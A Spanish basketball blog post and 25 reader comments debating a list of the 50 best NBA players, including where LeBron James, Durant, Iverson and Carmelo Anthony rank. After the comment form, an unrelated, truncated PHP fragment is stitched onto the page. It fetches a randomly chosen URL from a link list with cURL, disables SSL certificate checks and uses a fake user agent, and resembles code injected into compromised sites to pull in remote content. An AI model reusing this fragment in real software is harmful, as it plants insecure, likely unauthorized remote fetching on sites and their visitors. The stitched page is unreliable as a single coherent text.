Clásicos: Los 50 mejores jugadores de la historia

16 de June de 2012 por txusma

Es que parece que lo hagamos a propósito. Justo cuando estamos embarcados en un pequeño debate sobre el lugar en la historia que podría ocupar Lebron James, aparecemos para recordar un enorme artículo que publicó TheDeerHunter después de un impresionante trabajo de investigación. Dejando los aspectos subjetivos a un lado, TheDeerHunter se lió la manta a la cabeza y se atrevió a publicar la que para él era, en agosto de 2009, la lista de los 50 mejores jugadores de la historia de la NBA. El artículo era el colofón de una serie en la que desgranaba los 10 mejores en cada posición ofreciendo sus argumentos. Os animamos a leerla entera.

¿Qué opináis de la lista original?¿Harías algún cambio 3 años después? Aprovechemos este tema para reabrir el debate.

Comenta

25 comentarios a esta entrada

  1. Pablete dice:
    #1

    En esa lista creo que ya debería aparecer Lebron, y Durant depende de lo que pase en las finales, pero ya anda cerca.

      Citar

  2. Txusma dice:
    #2

    Pablete:
    En esa lista creo que ya debería aparecer Lebron, y Durant depende de lo que pase en las finales, pero ya anda cerca.

    Vaya por delante que a mi me encanta Durant pero el hype empieza a ser exagerado.

      Citar

  3. Pablete dice:
    #3

    Ya sé que esto son unas “listas-premio” a la carrera completa del jugador, pero si Iverson es el 27 mejor jugador de la historia, no veo porque Durant no puede ser uno de los mejores 50 teniendo un anillo hipotético anillo y promediando más de 30 puntos en playoff.

      Citar

  4. Jose Luis dice:
    #4

    Estamos hablando de los mejores de la historia y Durant aún no ha hecho absolutamente nada. Si se lesionara ahora y no jugase más, no entraría en esa lista ni de coña. Y LeBron… no sé si entraría en el caso de que su carrera se acabase hoy.

      Citar

  5. MagicJohnson32 dice:
    #5

    No recordaba la discusión que mantuve con Deer a raíz de su lista. Ante todo, en su momento me parecía y ahora me sigue pareciendo que la lista es excelente.

    Y, por supuesto, me sigue pareciendo que poner a Magic en la quinta posición es una atrocidad.

      Citar

  6. Txusma dice:
    #6

    Pablete:
    Ya sé que esto son unas “listas-premio” a la carrera completa del jugador, pero si Iverson es el 27 mejor jugador de la historia, no veo porque Durant no puede ser uno de los mejores 50 teniendo un anillo hipotético anillo y promediando más de 30 puntos en playoff.

    Es que lo de Iverson lo podemos discutir aunque de toda manera el de los Sixers se tiró 12 años promediando más de 22 puntos por partido y tuvo 4 temporadas por encima de los 30 puntos por partido. Como dice Jose Luis, a dia de hoy Durant no ha hecho suficiente como para entrar en la lista de los 50 y aunque ganara el anillo y se llevara el MVP de las finales, creo que se quedaría a las puertas. Eso sí, si sigue a este ritmo y se concreta todo lo bueno que vemos en él, lo veo con posibilidades de TOP-20 o TOP-10.
    Para mi Lebron, a día de hoy y sin anillo, roza el TOP-50. Son ya muchos años a un nivel extraterrestre.

      Citar

  7. melo15 dice:
    #7

    Que ha de hacer Tim Duncan para entrar en el Top-10, 4 anillos, 3 MVP Finales, Tropecientos quintetos de todas las clases, All-Star todas las veces posibles…Esta por encima de Petit, West, Baylor…
    Abro un debate. Que ha hecho Allen Iverson aparte de un MVP, tener mucha calidad y tirarse el doble de tiros que los demas. Porque si lo colocas el 27, solo que Melo haga un par o tres de temporadas de 28 puntos, pasa unas quantas rondas de Playoffs ya lo pones el 50 no?
    Es mas Lebron ya esta por encima de Iverson, porque lleva mas MVP, mas Finales, mas quintetos defensivos y porque es mejor defensor, reboteador y da las mismas asistencias.

      Citar

  8. COACH dice:
    #8

    Ya he puesto en el post mi opinión, sobre este tipo de valoraciones. Sobre Iverson, el final de su carrera no nos puede hacer olvidar el lustro que se marco el amigo, creo que solo Lebron James y él, han conseguido llevar unos equipos mediocres a una final de la NBA, donde posiblemente aquellos Sixers y Cavaliers han sido los peores equipos en llegar a la final, y eso tiene un mérito impresionante. De echo es el parámetro más importante de un jugador: La capacidad para hacer mejores a sus compañeros, por eso Bryant nunca será Jordan. Dicho todo esto creo que Kevin Durant tiene en la mano meterse en el TOP-3, si sigue así (otros 9 o 10 años) y los Thunder son capaces de mantener y mejorar paulatinamente el bloque. Es demasiado bueno y demasiado decisivo. Mi opinión.

      Citar

  9. Pablete dice:
    #9

    Si os fijáis, en mi primer comentario digo que Durant anda cerca, no que tenga que estar ya. El único que digo que tendría que estar hoy mismo es Lebron. Nos tiene ya acostumbrados y ya no nos sorprende, pero los números que hace y el dominio que demuestra parecen de otros tiempos. Solo le falta meter los buzz beaters esos.

      Citar

  10. Viva_Dirk dice:
    #10

    Lo de Iverson es de traca, ciertamente podria estar el 27…mil, cada año hay en la liga 27 mejores que el, como para no haberlos en toda la historia.

    El jugador mas sobrevalorado de todos los tiempos, con muuuuuuuuuuuuuuuuuuuuucha diferencia respecto al segundo.

      Citar

  11. nba dice:
    #11

    No hay que quitar merito a lo que hizo Iverson, teniendo en cuenta las autenticas bestias interiores que habia en su epoca .
    Supongo que todo depende de lo que se valore en un jugador, pero eso no quita para que Shaq y todos los Lakers llegasen a tener pesadillas con el en aquellas miticas finales.
    Por cierto que opinais de la noticia, que parece que Roy quiere volver a las pistas .??
    Con el buen sabor de boca que nos habia dejado cuando estaba en su plenitud, lo que haga ahora no puede nada mas que empeorar su recuerdo

      Citar

  12. melo15 dice:
    #12

    Bueno a todos los jugadores les cuesta adpatarse a una nueva vida, y en cuando se retiran todos lo echan de menos y mas en el caso de Roy, que estaba en la plenitud de su carrera.
    Personalmente me parecia un supercrack y me sueño con que vuelva a recuperar ese nivel.

      Citar

  13. TheDeerHunter dice:
    #13

    La lista se creó hace casi 5 años y obviamente es revisable. En todo caso está confeccionada sobre hitos logrados y no imaginarios. Es decir, se deberían tener en cuenta los MVP de LeBron pero no los 10 anillos que hipotéticamente ganará Durant o el potencial de fealdad que posee Anthony Davis.
    Tampoco tiene en cuenta las obsesiones, manías persecutorías ni ojerizas varias. Es decir, los títulos de anotador de Iverson, sus all-star, récords, premios, trayectorias en playoffs… fueron los que fueron independientemente que no te guste su mostacho u odies su marca de zapatillas.

    Sin pararme a pensar los cambios, teniendo en cuenta que nos costó un mes de curro aquel proyecto, a bote pronto pienso que habrá que revisar la posición de Kobe, la de LeBron, la de Dirk y posiblemente la de Kidd y Duncan. No tengo muy claro si alguna más.
    Que quede muy claro que hoy, quede como quede el anillo, opino que Durant no se merecería entrar en ella aún. En un futuro estoy seguro que entrará si no hay nada raro de por medio.

      Citar

  14. TheDeerHunter dice:
    #14

    Ah, y Carmelo Anthony no creo que vaya a entrar en su vida.

      Citar

  15. melo15 dice:
    #15

    Y por que no??

      Citar

  16. TheDeerHunter dice:
    #16

    Por que me parece extremadamente improbable que logre un MVP, dispute algún título o logre algún hito individual o colectivo más allá de viajar a algunos all-star o el tercer equipo de la liga alguna vez.
    Los últimos 10 nombres que en su día dí eran: Pippen, Schayes, English, Sam Jones, Parish, McHale, Worthy, Stockton, Webber, Monroe y Bill Walton.
    A ellos hay que añadir nombres importantes como son los Nowitzki, Kidd, Nash o los LeBron, Wade, Durant y otros que se quedaron en el tintero de la lista oficial de la NBA de 50 y que se cayeron por unos motivos u otros de ésta.

    Honestamente Melo no tiene currículum para estar en estas quinielas.

      Citar

  17. Melo15 dice:
    #17

    Bueno a Melo aun le quedan 6 años a muy buen novel, t todos sabemos que si los Knicks hubieran estado todo el año com Woodson, podrian haber peleado por ñas Finales e Conferenci y ahora mismo no veo 3 mejores equipos en la Conf. Este mejores que los Knicks. Creo que el año que viene peleara por el MVP, ya se vio el nivel que despliega con Mike Woodson, espectacular.

      Citar

  18. TheDeerHunter dice:
    #18

    No sé, chico. A mí no me ha parecido tan espectacular.
    A Carmelo le tengo por un buen anotador, sin más. Cada año que pasa me va dejando más frío.

      Citar

  19. Sancho88 dice:
    #19

    Hombre, Carmelo ha tenido momentos ‘arenianos’ y ‘macgradynianos’, es decir, esos partidos que parece que puede meter 50 o 60 puntos. Pero son un oasis en su carrera, y además, contextualizando, yo siempre digo que el último mes de los Knicks en la regular fue tan bueno porque pocos equipos en el Este se jugaban casi nada, y ellos se lo jugaban todo. Para mí, la sensación de este chico es que empezó a la par con Lebron, Wade, Bosh, etc. pero mientras ellos aprendieron a jugar en equipo, Carmelo no evolucionó prácticamente nada en su conocimiento de juego. Solo con técnica individual y sin nada de IQ no se puede llegar a ser alguien tan importante como para considerarlo entre los 50 mejores de la liga. Si está entre los 100 primeros ya es un logro, no creas. La liga lleva muchos años y han pasado grandiosos jugadores. Carmelo es muy muy buen jugador, pero claro, no sé a quién o quienes de esta lista podríamos quitar para incluirlo. Me agrada mucho ver a C-WEBB ahí macho, es una alegría que mi ídolo aparezca

      Citar

  20. simon dice:
    #20

    no creo que pueda haber debate en torno a Carmelo, hoy por hoy no está no ya entre los 50 no, si quiera esta entre los mejores 150 de la historia ( y no creo que nunca lo esté ) como parra discutir su futuro supuesto puesto entre los 50 mejores.

      Citar

  21. txusma dice:
    #21

    En nuestro partícular libro sagrado (basketball-reference) tiene una lista de los mejores de la historia basada en un sistema ELO, el del ajedrez. La gente puede entrar y se le presenta una comparación entre 2 jugadores. Tan solo ha de seleccionar el que le parece mejor y este ganará unos puntos en función de la posición que ocupa el rival en la lista. Si se compara a Duncan con Olowakandi y alguien dice que Olowakandi es mejor, este suma más puntos que si se compara a Olowakandi con Scalabrini, no sé si me explico.
    La cuestión es que después de muchas y muchas votaciones por parte de los usuarios (tb podíes participar: http://www.basketball-reference.com/friv/elo.cgi) la lista de los 10 mejores de la historia es:
    – Magic
    – Jordan
    – Bird
    – Olajuwon
    – Robertson
    – Erving
    – Russell
    – Jabbar
    – Malone

    Evidentemente no le podemos hacer mucho caso pq Kobe Bryant (en lo q parece un ataque en toda regla) está en la posición 98 por detrás de… Ben Wallace.

      Citar

  22. TheDeerHunter dice:
    #22

    Otro de los ejemplos por los que no le tengo ni el más mínimo respeto a ese tipo de encuestas populistas y volubles… por no calificarlas de otra manera
    y porque no se ha hecho en el marca, porque lo mismo salía como primero christiano ronaldo

      Citar

  23. Pop dice:
    #23

    Decía Isaac Asimov que uno obtiene un premio Nóbel al ser el primero en descubrir algo, pero sólo una mención a pie de página al continuar ese trabajo. Es algo tan real como posiblemente injusto, y a veces nos pasa también al comparar jugadores NBA.

    De todas maneras, como bien se dice por aquí, comparar jugadores de diferentes épocas generalmente es sólo un ejercicio mental metafísico. Tratar de pensar qué hubiera hecho Shaq en los 60 o Russell en los 90 es poco menos que ciencia ficción.

    Una de las pocas cosas que tengo claro es que normalmente el tiempo va poniendo a cada uno en su sitio. A los jugadores actuales hay que clasificarlos dentro de unos cuantos años, cuando echemos la vista atrás y veamos sus carreras en su conjunto, y nos acordemos de los momentos épicos que hayan tenido. Tratar de catalogar en la historia a un jugador actual es muy difícil, porque juega un partido cada 4 días, y eso es como ver las puntadas individuales de un gran tapiz. Es mejor mirarlo de lejos.´

    La otra cosa que empiezo a pensar, sobre todo leyendo comentarios de los más jóvenes, como Melo15, es que nos estamos acostumbrando a ver a los jugadores como sus versiones del 2k. Ahora tendemos a analizarlos cuantitativamente, casi como asignarles valores (90 en tiro, 86 en pase, etc…), creo que muy influídos por la cultura americana de la estadística. Y tendemos a comparar a los jugadores mediante ese sistema inconscientemente (éste tira mejor, aquél asiste más, etc…), y a veces la sinergia de sus capacidades es mayor/menor que su suma. A eso se refería Larry Bird con aquello de que Dirk “tira mejor, era más fuerte, etc etc … pero yo era mejor jugador”. Real como la vida misma.

      Citar

  24. @kex dice:
    #24

    YA LEBRON DEBE APARECER EN ESTA LISAT SIN NINGUNA DUDA, AUNQUE NO ES DE MIS FAVORITOS TENGO QUEB ACEPTAR QUE ES EL JUAGDOR MAS DETERMINANTE DE LA LIGA Y SUS NUMEROS NO DEJAN INDIFERENTE A NADIE, TAMBIEN INCLUIRIA A DIRK….

      Citar

  25. Txusma dice:
    #25

    @kex:
    YA LEBRON DEBE APARECER EN ESTA LISAT SIN NINGUNA DUDA, AUNQUE NO ES DE MIS FAVORITOS TENGO QUEB ACEPTAR QUE ES EL JUAGDOR MAS DETERMINANTE DE LA LIGA Y SUS NUMEROS NO DEJAN INDIFERENTE A NADIE, TAMBIEN INCLUIRIA A DIRK….

    Hola Kex. 3 años, después, con los anillos de Lebron y Dirk toca revisar. Creo recordar que al alemán ya lo consideramos el 10º mejor ala-pívot de todos los tiempos antes del anillo (y su correspondiente brutal actuación en aquellos playoffs y aquella final). A mi modo de ver, Dirk debería estar por encima de McHale, sin ninguna duda.

    Un cosa: podrías no escribir en mayúsculas? Cuesta más de leer. Gracias!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>